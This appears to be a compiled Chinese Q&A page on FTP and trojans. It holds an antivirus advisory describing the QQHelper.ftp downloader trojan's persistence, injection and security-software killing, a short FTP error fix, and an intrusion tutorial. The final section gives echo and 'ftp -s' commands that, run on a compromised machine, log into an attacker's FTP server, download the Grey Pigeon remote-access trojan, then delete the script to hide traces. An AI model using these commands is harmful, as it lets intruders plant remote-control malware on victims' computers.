ftp傳木馬

❶ 什麼是ftp木馬

木馬下載者 Trojan-Downloader.Win32.QQHelper.ftp

病毒名稱

Trojan-Downloader.Win32.QQHelper.ftp

捕獲時間

2007年9月9日

病毒症狀

該木馬程序是一個用Delphi語言編寫的木馬，長度127,488 位元組，無裝飾性圖標，發作後將自身和釋放的庫文件Vermin.dll插入explorer.exe及其子進程，在後台下載其他木馬程序。

病毒分析

該木馬是一個比較頑固的木馬程序，觸發後會拷貝自身文件到系統目錄的inf文件夾下執行，並將其注冊為服務名為＂Windows Media Service＂的系統服務以獲得系統許可權，服務描述＂管理多媒體設備，如果服務被終止，音頻設備及其音效將不能正常工作。如果此服務被禁用，任何依它的服務將無法啟動＂；釋放Vermin.dll監控系統消息；通過調試手段將自身映像和Vermin.dll模塊注入到explorer.exe及其所有子進程中，在後台調用相關下載函數下載其他木馬程序；通過查找窗口以及窗口類的方式獲取某些安全軟體的進程，嘗試強行終止安全軟體進程或通過發送消息強行關閉其窗口；使用IFEO映像劫持系統文件ctfmon.exe（即Windows任務欄的語言欄工具條）到病毒映像路徑，使得木馬會在開機時自動啟動。

感染對象

Windows2000/Windows XP/Windows2003

傳播途徑

文件捆綁/網頁木馬傳播

安全提示

已安裝微點主動防禦軟體的用戶，無論您是否已經升級到最新版本，微點主動防禦都能夠有效防禦該木馬程序。如果您沒有將微點主動防禦軟體升級到最新版，微點主動防禦軟體在發現該病毒後將報警提示您「發現未知木馬」，請直接選擇刪除處理（如圖1）；

如果您已經將微點主動防禦軟體升級到最新版本，微點將報警提示您發現Trojan-Downloader.Win32.QQHelper.ftp」，請直接選擇刪除（如圖2）。

使用其它殺毒軟體的用戶，請盡快將您的殺毒軟體特徵庫升級到最新版本進行查殺，並開啟防火牆攔截網路異常訪問，如依然有異常情況請注意及時與專業的安全軟體廠商聯系獲取技術支持。由於該病毒的特殊性，會自動終止某些殺毒軟體運行，如果您的殺毒軟體已經無法正常運行，您也可以嘗試安裝微點解決。

沒有安裝微點主動防禦軟體的用戶，建議您盡快安裝使用微點主動防禦軟體查殺預防各類新病毒。

❷ ftp傳輸不了文件 顯示嚴重文件傳輸錯誤

原因：設置錯誤造成。解決方法：重新設置伺服器來解決此問題。

如下參考：

1.首先打開個人FTP軟體，彈出如下界面。個人可選擇直接在窗口中輸入相關信息或通過網站管理器保存個人用戶信息。使用站點管理器保存個人信息，如下圖。

❸ 遠程計算機怎麼用FTP傳文件啊

在遠程計算機的cmd環境下，如果不能通過ipc$渠道傳送文件，那就只有通過ftp下載文件了。
假設我們已經有一個ftp伺服器，上面有一個我們配置好的灰鴿子木馬文件mhgz.exe,我們應該知道ftp伺服器的三個參數：
1、ftp伺服器的ip地址：如203.75.44.34
2、ftp伺服器的用戶名：如tty
3、ftp伺服器的密
碼：如tty123
在遠程計算機的cmd下依次輸入下面的命令：
1、echo
open
203.75.44.34>>tty.txt
登陸ftp伺服器
2、echo
tty>>tty.txt
用戶名
3、echo
tty123>>tty.txt
密碼
4、echo
bin>>tty.txt
開始
5、echo
get
mhgz.exe>>tty.txt
下載灰鴿子木馬
6、echo
bye>>tty.txt
關閉ftp伺服器
輸入上面命令後，在遠程計算機上就會生成一個tty.txt文件，內容為：
open
203.75.44.34
tty
tty123
bin
get
mhgz.exe
bye
現在我們在遠程計算機上執行下面的命令：
ftp
-s:tty.txt
意思是，讀取tty.txt里的參數，執行ftp命令，命令執行完後，灰鴿子木馬文件mhgz.exe就下載到對方計算機里了。
del
c:\tty.txt